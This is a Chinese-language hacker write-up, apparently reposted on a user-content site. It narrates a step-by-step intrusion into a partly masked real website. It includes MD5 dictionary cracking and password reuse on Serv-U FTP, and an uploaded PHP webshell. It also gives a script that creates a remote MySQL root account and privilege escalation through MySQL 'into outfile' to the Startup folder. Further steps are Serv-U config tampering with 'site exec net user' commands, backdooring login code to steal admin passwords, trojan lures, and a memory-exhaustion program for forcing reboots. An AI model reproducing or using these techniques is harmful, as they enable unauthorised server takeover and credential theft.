md5password_mingwen+left(password_miwen,2)=right(password_miwen,32)俗話說的好啊,"工欲善其事,必先利其器"在網(wǎng)上找了兩上絕配的工具!一個是MD5CrackSpV2.3(速度增強版,一個非常好用的MD5爆破工具),另一個是字典專家.BBSt,利用它我們可以生成前兩位為我們指定字母的字典!!MD5CrackSpV2.3速度奇快,我們可以指定開的線程數(shù),我在P4,256M內(nèi)存環(huán)境下做了一個測試,利用字典專家.BBSt生成一個含3億條記錄,1.2G左右的字典, MD5CrackSpV2.38線程跑,總共用了30分鐘!一個線程一秒鐘跑大約2萬條記錄,8個線程一秒鐘,就是16萬條記錄!!照此計算一臺機器一天就能跑約138億條記錄!假如有十臺P4連合作業(yè),威力無窮啊!同時在網(wǎng)上看到消息說山東大學(xué)已經(jīng)研究出來了破解MD5的算法!但是沒有找到具體的程序,程序一旦出世,密而不密,恐怕很多網(wǎng)站又要遭殃了!!

方法二:程序法.不要在一棵樹上吊死,一邊掛著字典爆破,一邊看看還有沒有別的途徑,雙管齊下嗎,要不閑著也是閑著(哈哈)!在c:\Program Files\Serv-U\ServUDaemon.ini文件中共有十多位用戶,其中有一個的用戶目錄:"d:\s***n\a***lover\photo\gallery" 吸引了我。立即在瀏覽器中打上http://www.*****.net/ a***lover/photo/gallery 出現(xiàn)如下提示:"This Virtual Directory does not allow contents to be listed",在試試它的上一級目錄看看:http://www.*****.net/ a***lover/photo/真是山重水復(fù)疑無路,柳暗花明又一村啊!原來在機子里還藏著個某某網(wǎng)絡(luò)相冊.首先注冊個用戶進(jìn)去看看,有圖片上傳功能啊,抓包看看是否存在有類似動網(wǎng)UPFILE的漏洞,用NC提交后失敗了,上傳類型還是圖片文件,又是那句話:"此路不通"。利用CASI查看http://www.*****.net/ a***lover/photo/index.php的文件內(nèi)容得知:程序中文名稱:文本圖片管理程序 程序英文名稱:NEATPIC  版本:2.0.13 BETA,老規(guī)矩先到網(wǎng)上下個研究研究在說。經(jīng)過分析目錄結(jié)構(gòu)發(fā)現(xiàn)在:database/user.php文件用于存放用戶名密碼等注冊信息!用CASI打開:http://www.*****.net/ a***lover/photo/database/user.php顯示無文件內(nèi)容!難道是默認(rèn)目錄不對?!管理員把目錄改了??!看配置文件:http://www.*****.net/ a***lover/photo/inc/config.inc.php發(fā)現(xiàn):
// 參數(shù)設(shè)置

//*********************************
$DataDir = "database678"; //
雜項數(shù)據(jù)存放目錄

$CatDir = "second"; //
二級分類數(shù)據(jù)存放目錄

$SortDir = "main"; //
分類數(shù)據(jù)文件存放目錄

$PicRecordDir = "picdata"; //
圖片數(shù)據(jù)總目錄

$PicDir = "pic"; //
圖片文件存放目錄

$SPicDir = "spic"; //
縮略圖存放目錄

$CommentDir = "comment"; //
圖片評論目錄

$UserDat = "user.php"; //
用戶數(shù)據(jù)文件

$Dat = "dat.php"; //
相冊數(shù)據(jù)文件

果然管理員把默認(rèn)的database目錄改成了database678了!現(xiàn)在可以用CASI查看user.php的內(nèi)容了如下圖:

最下面的哪一行即ID=1的為管理員的注冊信息,第一個為用戶名,第二個為密碼。發(fā)現(xiàn)該用戶名與ServUDaemon.ini中的相同,密碼會不會也相同呢?(很多人都有使用同一密碼的習(xí)慣?。。┐蜷_DOS窗口-->登錄FTP-->輸入用戶名和密碼,成功了,終于成功了!揪出這個密碼可真不容易啊??!這時字典還在哪掛著來,要跑出這個8位純字母的密碼也要費一段時間?。?!

一、 上傳PHPSHELL,控制MYSQL數(shù)據(jù)庫

通過ServUDaemon.ini文件中的Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP知道該用戶具有:讀取(R),寫入(W),追加(A)等功能,唯獨缺少了"執(zhí)行(E)"功能!利用PUT命令上傳一個一句話的WebShell上去.在瀏覽器中運行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出現(xiàn):
Warning: passthru(): Unable to fork [dir] in D:\s***n\a***lover\photo\gallery\webshell.php on line 1
看來外部命令不能執(zhí)行,管理員一定作了相應(yīng)設(shè)置.再上傳一個phpinfo.php文件 在瀏覽器中運行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,這時在php.ini變量的設(shè)置都顯示出來了(當(dāng)然也你可以利用CASIc:\windows\php.ini 的內(nèi)容)!外部命令不能執(zhí)行的原因在此:

safe_mode

Off
Off
safe_mode_exec_dir
no value
no value
safe_mode_gid
Off
Off
safe_mode_include_dir
no value
no value

接下來上傳一個自己編的僅帶有瀏覽,拷貝,重命名,刪除文件和上傳文件五個功能的PHPSHELLCMD.PHP

:由于時間倉促代碼界面沒優(yōu)化好,在dir文本框中輸入要瀏覽的目錄名稱;copy文本框中,上面輸入源文件如d:\web\cmd.php,下面輸入目標(biāo)文件如d:\web\cmdbak.php;del文本框中輸入要刪除的文件名如:d:\web\cmdbak.php;ren命令與copy命令相似;點瀏覽按鈕,選擇你要上傳的文件,然后點upload按鈕,就上傳到與本SHELL相同的目錄下了.

運行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D,C:\windows,以及C:\Program Files下的內(nèi)容,而且對D盤還有寫權(quán)限!在通過copy命令把想下載的軟件考到WEB目錄下下載下來了^_^

如何才能把文件寫到只讀的C盤上呢這就要通過MYSQL!但是MYSQL沒有遠(yuǎn)程連接啊!沒有條件創(chuàng)造條件,看文章系統(tǒng)的配置文件config.inc.php的內(nèi)容了嗎?
    $dbhost="localhost";//數(shù)據(jù)庫主機名

$dbuser="root";//數(shù)據(jù)庫用戶名

$dbpass="******";//數(shù)據(jù)庫密碼

$dbname="article";//數(shù)據(jù)庫名

數(shù)據(jù)庫用戶名和密碼都知道了,可惜的是本地用戶,然而我們能不能通過本地有最高權(quán)限用戶root來添加個遠(yuǎn)程用戶呢?答案是肯定的。

為此專門寫了個程序adduser.php利用已知的有ROOT權(quán)限的賬號添寫加遠(yuǎn)程ROOT權(quán)限的賬號,內(nèi)容如下:

$dbh=mysql_connect(‘localhost:3306‘,‘root‘,‘*****‘);//

echo mysql_errno().": ".mysql_error()."
";

mysql_select_db(‘mysql‘);

echo mysql_errno().": ".mysql_error()."
";

$query="GRANT ALL PRIVILEGES ON *.* TO username@‘%‘IDENTIFIED BY ‘password‘ WITH GRANT OPTION";

$res=mysql_query($query, $dbh);

echo mysql_errno().": ".mysql_error()."
";

$err=mysql_error();

if($err){

  echo "ERROR!";

}

else{

  echo "ADD USER OK!";

  }

?>

利用cmd.php上傳adduser.php執(zhí)行后,就在庫中添加了一個遠(yuǎn)程ROOT賬號,就可以用CASI帶的MYSQL連接器連上了!!它可以把MYSQL庫關(guān)了??!用牛族可方便的瀏覽表中的記錄?。∪缦聢D:帶%號的用戶為添加的遠(yuǎn)程用戶。

四、 提升權(quán)限

FTP是ServU5.0.0.4又有用戶名和密碼,自然會想到是否存在溢出,在網(wǎng)上搜個工具sftp

執(zhí)行Sftp -I 211.92.***.*** -u b*****b -p ****** -t 1 -o 1 -p 21后沒有溢出成功,看來是管理員打了補?。∧闹缓孟雱e的辦法了!(-I 表示ip地址,-u 用戶名,-p 密碼-o操作系統(tǒng)類型,-p 端口號) 以下總結(jié)了幾種提升權(quán)限的方法供大參考:

方法一、打開牛族MYSQL連接器,在命令行上輸入:

user download;

create table cmdphp (cmd TEXT);

insert into cmdphp values("set wshshell=createobject(\"wscript.shell\")");

insert into cmdphp values("a=wshshell.run(\"cmd.exe /c net user hello hello\",0)");

insert  into  cmdphp  values("b=wshshell.run(\"cmd.exe /c net user localgroup administrators hello /add\",0)");

select * from cmdphp into outfile "c:\\Documents and Settings\\Administrator\\[開始]菜單\\程序\\啟動\\cmdphp.vbs";

注意:在路徑中要用"\\"而不是"\",要加雙引號時,前面必需加"\"。原理是:我們在download數(shù)據(jù)庫中,建了一個表cmdphp,表中共一個字段cmd,我們把要執(zhí)行的命令寫到表中,然后在在表中導(dǎo)出到啟動菜單中!這樣只要一重起后,我們就會得到一個管理員級的用戶hello了。d:\s***n\a***lover\photo\gallery

方法二、修改SERV-U的文件ServUDaemon.ini中的相應(yīng)內(nèi)容:
Password=hq50AAF4CB3FA4EF89C9E9D605B20B2971

HomeDir=c:\

RelPaths=1

TimeOut=600

Access1=D:\s***n\ a***lover\photo\gallery |RWAMELCDP

Maintenance=System

SKEYValues=

把密碼換成我們知道的密碼,把主目錄換成c:\,Access1后的目錄可以不用換,這樣使管理員在SERV-U里看起來還是以前的目錄名,|RWAMELCDP這一串是關(guān)鍵,我們比以前多加了一個"E"代表我們有"執(zhí)行"權(quán)限,Maintenance=System表示我們的身份是管理員。

在本地設(shè)置好后,就開始想辦法,替換掉它的文件?首先,利用我的哪個cmd.。php SHELL的上傳文件功能,先把它上傳到d:\s***n\a***lover\photo\gallery目錄(上傳成功后文件與SHELL在同一目錄)下,同樣再打開牛族MYSQL連接器:
    user download;

create table servu (cmd TEXT);

load data infile "d:\\s***n\\a***lover\\photo\\gallery\\ServUDaemon.ini;

select * from servu into outfile "C:\Program Files\Serv-U\ServUDaemon.ini";

條件是SERV-U重啟后,我們的哪個用戶就是管理員了,而且在C盤根目錄下具有可執(zhí)行權(quán)限。登上SERV-U服務(wù)器上執(zhí)行如下命令:

quote site exec net.exe user hello hello /add

quote site exec net.exe localgroup administrators hello /add

這樣我們就得到了一個管理員級的用戶hello。如果沒有開3389我們可以利用PUT上傳給它上傳個3389.EXE,然后用quote執(zhí)行后,就可以用3389登錄器連接了!同樣我們也可以利用另外一個小工具xyzcmd.exe在DOS下登錄,會得到一個CMDSHELL.

方法三:由于管理員在PHP.INI中做了一些限制,上傳的PHPSHELL沒法執(zhí)行外部命令,利用CMD.PHP的瀏覽命令,你可以在它的上面找到它的PHP和SERV-U的安裝程序,DOWN下來,在本機上模擬它的環(huán)境,配置自己的PHP.INI文件,使它能夠執(zhí)行外部命令,解釋ASP和CGI,然后利用方法二替換掉它的PHP.INI文件。也有個條件就是WEB重啟后才能生效。我們需要一個小東西-FPIPE.EXE端口重定向工具!fpipe -v -l 5210 -s 5209 -r 43958  127.0.0.1(把本機的43958端口,通過5209端口,轉(zhuǎn)發(fā)到5210端口)打開你本地SERV-U添加一臺服務(wù)器,來連接5210,填上服務(wù)器IP,監(jiān)聽端口號5210,填上帳戶和密碼!                  user:LocalAdministrator    pass:#l@$ak#.lk;0@P全部搞定后,來連接SERV-U,連接成功后,我們就對此服務(wù)器SERV-U有了完全控制權(quán)限!然后登錄上SERV-U加管理員用戶就OK了!

方法四:社會工程學(xué)加網(wǎng)頁木馬!在04年黑防第6期我的朋友血漢的《網(wǎng)頁木馬讓你肉雞成群》一文中,講了許多做木馬的方法,在這里就不啰嗦了,省的老獨說轉(zhuǎn)稿費,哈哈!把"馬"傳上去后,可以在論壇里發(fā)個貼子,如"管理員我發(fā)現(xiàn)了此網(wǎng)站一個漏洞!"或"管理員我對網(wǎng)站有幾點建議"估計不久真的會成為"養(yǎng)雞專業(yè)戶了"。建議不要改人家的主頁,一來不好,二來如果掛在主頁上,管理員看到后不一定會點開!還有更隱蔽的一招,就是修改源程序(估計一般管理員不會沒事讀源程序吧^_^),找到網(wǎng)站登錄的程序,加一段程序,可以根據(jù)ID來判斷是管理員,如果是把他的密碼(在如MD5加密前)插入到你的信箱或QQ等字段中,這樣你可以打開你的用戶資料來看了??!

接下來談?wù)勅绾谓蟹?wù)器重起:方法一、我非常建議用的方法哪就是DOS攻擊!方法二、如果你上傳的SHELL能執(zhí)行命令!可以傳一個很簡單的C程序,讓它不斷地MALLOC分配內(nèi)存,而且不FREE。

#include

#include

main()

{for(; ;) malloc(0xffffff);}

方法三、如果一些網(wǎng)站是PHP的不能執(zhí)行外部命令(我們上傳上去的可執(zhí)行文件不能運行)!哪位高手編一個PHP程序耗掉它的資源!


    本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊一鍵舉報。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多